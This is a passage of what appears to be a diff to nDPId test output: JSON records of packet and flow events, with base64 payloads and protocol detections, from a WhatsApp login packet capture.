+e4qwU8QRYv94bSptDA1mC5d7hLaair0kLj5FJuw9fQYw56jdCBuIztl42Q9ip+eJzWCXzcqrMuxyZhMkusneUAU213bxe7LIroTzopLTvDr1KXzVypQq1ZP5NCiggcKfqeKZidfD+aXqLGRh7olUlGpaHuqy1maaxpidAIrK\/rniCznE3Y8bsAPAq11XlkH+mjEIj4B5Et\/0lF+xCPP+z5E9ZGqKuPoSIYCKQzbemYTMMkhnWOl6BB5kOc48mQHXcM\/HEeMKQ4qb33pU8bbK3Mr9Vb0pzxFXpDLLr1AV4WOOsDEdqZRvrHbAGGit7Ox3YtWydJ61deheU2gY0jifGxvWb6TKpitF7KENLzDKe6R1+jkekRnLVGAoiZ6cidxCTodgPGJaODRed4KQauNt6lzH+E+PJp48Tc7z95H2uvpzfMxaqZdwBSkB4v4ScjVowzkErkvUxVQNOveEwAJQDuk\/MJnrSUEivzWnCcp3a+GPlrKE2YjKybAPuXK8NmegG3utqM2DgTsUTgCNR+3ESE1g9tqjPpb6WMGMIfSBz2fb5tlr8mBN4CEu0H72FkFaOVAQvrDFdSC9uWsLI+9xr\/qifTPscJiK47gZwd7xJ1+AvgSKzzkjQwgSwyGtffBvX0O0GlFuSMAxYjLubFvVAvKhF6gkJ9oPlwZ9pkLOs5hTGXcjvBfkdt78lFxJQl3eijMQRas5LDn3A9Tn53tCW5oXAuOYXz4b"} -01106{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1432582381179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":531,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":531,"pkt_l4_len":497,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAIFAqxAAEAGH4jAqAIEEa1CZsA1Abt+cl8spMYxPVAYQAAK4wAA+zXxkGmxqmlJcwlR7TpHpRtDDy9iaRt9w+hOFsERXuy8gwV22TTGXYqWLP3aSg0FRpPNh6b2JxTA9OSkJEk04NCfWqJRauLthWRuA7XoVn8i6Smk+coAOa3u15Yq91KVTfK0Likn42RkhoMCTU67u6i6Y4GW7d7uWiM6L3uLokbbGTmGs29u3afEGnNWZwLcuyp6rGxmPmWxvxgkiNCzEIsj5+jDbrTqLXDyyF322ZG7ztnAr92I1EUwbaElkdT9P28rYnazLdDX3NtrMNZoVpJg+JtJ\/7kZqQ2Wqzmg\/a3xXi4EVY3r6CTewAoUnubR3Qb8d8SxZWO8dXB980UXO8ObJWaEL5I20Sp30w7kYXi8hv4VgTLwR\/5GH+diyQKZuXNNplXdUL9qR0BnzfYHcTgjG28TOg74dTk611xDBeVR4Itg6rhO4EXCbpfiRmK6bb3CXGkaTCMHxUnezI+xc2Wog+XxCXrGyOiN2uGEyOBaMLxsAdU\/WfMK5Hg2kk6QV97kZZAhmz0GEeQIuwbiHtXsFgOmiLHGkBFU3uvrL2U0AIsy\/dg28ProYM\/UVKotXUmjaEkwo4XPHqyzoqhSMSd8fGbpRTWD+Jj7SG1OLSQLZ6OzyLhulPpesWWw"} -01222{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1432582381179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":610,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":610,"pkt_l4_len":576,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAJULUhAAEAG9JzAqAIEEa1CZsA1Abt+cmEJpMYxPVAYQAAkaQAAFwMDAifRP6n1iN3uB\/Uhy6B3MN22nTeVXJRqDhAyLGWagzjVPV67eGMiWlDpxIYk9ZRXb8ENyJMklAVg5qQxAfredM796d1woE5CM\/dDlnC9hhfBLqlOMT0Sc23vnR6S0CtE+vcI2IEc50YYFIr8cCuBcLPUtehQ+6FiIBzPUNdC8gBpCK0l8ehCaB6UsJ+9Lz+rqI7LymD80O7JD9GQGlEzf0ROrOYPwKN9oloslBYMUuNcVtuTSnZlQf6clnYgiVqjkPEIWZnj1\/SzJxC0XzXDZTCazzjZUphrvHsUFVKI\/iQfQLn2Pm20z\/bY+umTrESbc\/Rb\/jTAxKkWPlTguW5QNPTgHe+8CLbu8GlNIUhp6XnzV0lotZMlMuaBJakvd6GmWA8qWeiSGeNI8Nxabsp54T+pQf+cFTWMVSzn894mO+DZZ3gtq32z87kDjYiMhE2jHBbOrnjFvxmtQtZu7lyboSLDYh55cOzJECLrbK8MSRuDtHOP5G6iepYtPwv3WMGLCV+hTD9hULIUKlQnW8NxmNPf6x7m2WXh+T5KFO1k2GNZTSM8sWZLLJiGPB3r5p1nS3ObF9UaRS1rU\/+0JK5FT6PVQl\/T6rcJ66cGodbOS0a03YtqhfdlphEfqQSNy4IBPyE7+TYhqlI5kH8vw+oFYBVtxUinzFEEO03Tz6ey1LN8P\/4vb9rv1pyNfFxaNarK\/6\/1noAhKaU7nGWU\/L6Er+GI\/BOXYTn7Ng=="} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":53,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582381179,"flow_last_seen":1432582384764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15219,"flow_avg_l4_payload_len":475,"midstream":1,"thread_ts_msec":1432582384764,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582381179,"flow_last_seen":1432582384764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15219,"flow_avg_l4_payload_len":475,"midstream":1,"thread_ts_msec":1432582384764,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379591,"flow_last_seen":1432582379591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582379591,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432582379591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582379591,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAjylAAEAGEH7AqAIEnlU6D8A2FGYksXJ9AAAAALAC\/\/+BgwAAAgQFtAEDAwQBAQgKLfyAogAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432582379745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432582379745,"pkt":"APS5Jrv0xiwDYGpkCABFAAA8XOEAADUGjcqeVToPwKgCBBRmwDYfJVHSJLFyfqAS\/\/8RNgAAAgQFrAEDAwkEAggKXZ2yry38gKI="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1432582379848,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582379848,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0bGhAAEAGM0vAqAIEnlU6D8A2FGYksXJ+HyVR04AQIFgeowAAAQEICi38gaNdnbKv"} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582379591,"flow_last_seen":1432582380392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1432582380392,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582381179,"flow_last_seen":1432582381179,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582381179,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02415{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1432582381179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAXIltFAAEAGh5\/AqAIEEa1CZsA1Abt+clmMpMYxPVAQQABXnAAAFwMDB3i+HiPgShCayKsiCSxppt+UVMG6sNLf32XwXp\/5y1\/Gi93F3S41DWF8\/kCqCE3bWkUsOQ\/D44TQ+2n51pbyMSPLw0aW5BBc1KN+NXFB6c0\/EvLUkiCkXMNnoBikvRGoWqnT3MsBLR3ifxEfJkx0KA0FgI9JutlWbXDDUTzCRBEZTuRft2ygLhc453pAbiPG9v0WPMDLHXiyCBIVg\/B5dK4qKFD6E2UMKFMhu4mZRR2j\/6qxWlXTvDrMGoz+8Qo7VA74VXDOmIIqRacL+CmsjHCFgzIlevE9HbzQStt3waOocRqfRvIAnyjErcnsgCXougYuTv7e+MXADNmAZBilIIoi3Uil6da7kvrxaXQ4p+uZdx7Gy5yoHJv8xUlpNlf\/6TnuDJ0Sr34mxp2ViDhiTjdQbwAa3oxSYIriERZCD+iy2XBPrLEva6gxIYSFoMA1nMvNEDvwHAwVpPX12H1IQq6zqjIg+g2T3TBZpcZ71NLHtrlkBg9o5NZd7LL0MCoUc5LF5gFQhEphIEtekSiwBF\/vWaUkYpAxP7LvgNiCoLKAfwM9RyhmY\/groOK8zq86A8Z\/A5kmVimU2YKg3RBFJIj4fY5ZjJv5w7NZlJ5I4tkbJJp4AoKwuThn7szdjjoI\/Gz6k3Cz8YZmXMOwDviwyDpLeaUvIrJPOa1ciNsy0vHmM7ukkMbC8Ej95C27cDvULH7dL6T0XGOtlAh\/1i8BfnuG9hN4cxa\/b+5gAAhOFw1eAAyMGcUy23P+89rorZ3KMrek+vuNcICgkwnazh1Z5AFtIzlWlMfxbaxy\/+pJoR3DnO0EuyOOHz4IdCogPPXsieGyIHTaGzpebRd3ow8OikTIF2RiPLnkFeI25KqwWpGL6weTaFVmxqKuafYQNbLXqeb1mf\/DlBl7xTHdJ\/K7sh+ashtIQDjtOnXuANeb1sDwla5nv+DnrsBoezknxm9kI8r\/CTGWQN\/tTHUBQ3JnQu2sU3BgKQv67idjs6\/xEGKN0fSceO\/OmdSiRN4eY5AKeqGiRb0iQcOp0eoO0nHkil+B5uKPiznWHrrsTIB9dEBiXQpdbXNu0tyB5osy9qzKMkf\/o9uJ+QSQ5cIo7DjRzFZnpJOkCxvvXWU+FpzDhZxIpMTrOA0QqAGTa21N2fhnR7KTBe68GBzD362LyujtxvtI68Y+e4qwU8QRYv94bSptDA1mC5d7hLaair0kLj5FJuw9fQYw56jdCBuIztl42Q9ip+eJzWCXzcqrMuxyZhMkusneUAU213bxe7LIroTzopLTvDr1KXzVypQq1ZP5NCiggcKfqeKZidfD+aXqLGRh7olUlGpaHuqy1maaxpidAIrK\/rniCznE3Y8bsAPAq11XlkH+mjEIj4B5Et\/0lF+xCPP+z5E9ZGqKuPoSIYCKQzbemYTMMkhnWOl6BB5kOc48mQHXcM\/HEeMKQ4qb33pU8bbK3Mr9Vb0pzxFXpDLLr1AV4WOOsDEdqZRvrHbAGGit7Ox3YtWydJ61deheU2gY0jifGxvWb6TKpitF7KENLzDKe6R1+jkekRnLVGAoiZ6cidxCTodgPGJaODRed4KQauNt6lzH+E+PJp48Tc7z95H2uvpzfMxaqZdwBSkB4v4ScjVowzkErkvUxVQNOveEwAJQDuk\/MJnrSUEivzWnCcp3a+GPlrKE2YjKybAPuXK8NmegG3utqM2DgTsUTgCNR+3ESE1g9tqjPpb6WMGMIfSBz2fb5tlr8mBN4CEu0H72FkFaOVAQvrDFdSC9uWsLI+9xr\/qifTPscJiK47gZwd7xJ1+AvgSKzzkjQwgSwyGtffBvX0O0GlFuSMAxYjLubFvVAvKhF6gkJ9oPlwZ9pkLOs5hTGXcjvBfkdt78lFxJQl3eijMQRas5LDn3A9Tn53tCW5oXAuOYXz4b"} +01106{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1432582381179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":531,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":531,"pkt_l4_len":497,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAIFAqxAAEAGH4jAqAIEEa1CZsA1Abt+cl8spMYxPVAYQAAK4wAA+zXxkGmxqmlJcwlR7TpHpRtDDy9iaRt9w+hOFsERXuy8gwV22TTGXYqWLP3aSg0FRpPNh6b2JxTA9OSkJEk04NCfWqJRauLthWRuA7XoVn8i6Smk+coAOa3u15Yq91KVTfK0Likn42RkhoMCTU67u6i6Y4GW7d7uWiM6L3uLokbbGTmGs29u3afEGnNWZwLcuyp6rGxmPmWxvxgkiNCzEIsj5+jDbrTqLXDyyF322ZG7ztnAr92I1EUwbaElkdT9P28rYnazLdDX3NtrMNZoVpJg+JtJ\/7kZqQ2Wqzmg\/a3xXi4EVY3r6CTewAoUnubR3Qb8d8SxZWO8dXB980UXO8ObJWaEL5I20Sp30w7kYXi8hv4VgTLwR\/5GH+diyQKZuXNNplXdUL9qR0BnzfYHcTgjG28TOg74dTk611xDBeVR4Itg6rhO4EXCbpfiRmK6bb3CXGkaTCMHxUnezI+xc2Wog+XxCXrGyOiN2uGEyOBaMLxsAdU\/WfMK5Hg2kk6QV97kZZAhmz0GEeQIuwbiHtXsFgOmiLHGkBFU3uvrL2U0AIsy\/dg28ProYM\/UVKotXUmjaEkwo4XPHqyzoqhSMSd8fGbpRTWD+Jj7SG1OLSQLZ6OzyLhulPpesWWw"} +01222{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1432582381179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":610,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":610,"pkt_l4_len":576,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAJULUhAAEAG9JzAqAIEEa1CZsA1Abt+cmEJpMYxPVAYQAAkaQAAFwMDAifRP6n1iN3uB\/Uhy6B3MN22nTeVXJRqDhAyLGWagzjVPV67eGMiWlDpxIYk9ZRXb8ENyJMklAVg5qQxAfredM796d1woE5CM\/dDlnC9hhfBLqlOMT0Sc23vnR6S0CtE+vcI2IEc50YYFIr8cCuBcLPUtehQ+6FiIBzPUNdC8gBpCK0l8ehCaB6UsJ+9Lz+rqI7LymD80O7JD9GQGlEzf0ROrOYPwKN9oloslBYMUuNcVtuTSnZlQf6clnYgiVqjkPEIWZnj1\/SzJxC0XzXDZTCazzjZUphrvHsUFVKI\/iQfQLn2Pm20z\/bY+umTrESbc\/Rb\/jTAxKkWPlTguW5QNPTgHe+8CLbu8GlNIUhp6XnzV0lotZMlMuaBJakvd6GmWA8qWeiSGeNI8Nxabsp54T+pQf+cFTWMVSzn894mO+DZZ3gtq32z87kDjYiMhE2jHBbOrnjFvxmtQtZu7lyboSLDYh55cOzJECLrbK8MSRuDtHOP5G6iepYtPwv3WMGLCV+hTD9hULIUKlQnW8NxmNPf6x7m2WXh+T5KFO1k2GNZTSM8sWZLLJiGPB3r5p1nS3ObF9UaRS1rU\/+0JK5FT6PVQl\/T6rcJ66cGodbOS0a03YtqhfdlphEfqQSNy4IBPyE7+TYhqlI5kH8vw+oFYBVtxUinzFEEO03Tz6ey1LN8P\/4vb9rv1pyNfFxaNarK\/6\/1noAhKaU7nGWU\/L6Er+GI\/BOXYTn7Ng=="} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":53,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582381179,"flow_last_seen":1432582384764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15219,"flow_avg_l4_payload_len":475,"midstream":1,"thread_ts_msec":1432582384764,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582381179,"flow_last_seen":1432582384764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15219,"flow_avg_l4_payload_len":475,"midstream":1,"thread_ts_msec":1432582384764,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582396509,"flow_last_seen":1432582396509,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582396509,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01129{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1432582396509,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1432582396509,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISQPEAAEARsZnAqAIBwKgC\/0RcRFwB\/jsJeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582396509,"flow_last_seen":1432582396509,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582396509,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} @@ -33,21 +33,21 @@ 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1432582402667,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"thread_ts_msec":1432582402667,"pkt":"MzMAAAD7APS5Jrv0ht1gCRl1ADkR\/\/6AAAAAAAAAGJzDGxKYAiT\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5eQMAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADIABCF9haXJwbGF5wBIADIAB"} 00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402667,"flow_last_seen":1432582402667,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582402667,"l3_proto":"ip6","src_ip":"fe80::189c:c31b:1298:224","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 00862{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1432582404307,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1432582404307,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIRFgAAP8Rdk0AAAAA\/\/\/\/\/wBEAEMBNOdaAQEGALYzLg4ABQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"} -00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582411561,"flow_last_seen":1432582411561,"flow_idle_time":7440000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1432582411561,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1432582411561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582411561,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJu4AAC8GqngRbuUOwKgCBBRnwCnUixwguGhbLIAYAUleegAAAQEICm+JVxEt\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582411561,"flow_last_seen":1432582411561,"flow_idle_time":7440000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1432582411561,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} -00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1432582412221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582412221,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJu8AAC8GqncRbuUOwKgCBBRnwCnUixwguGhbLIAYAUlb7AAAAQEICm+JWZ8t\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvF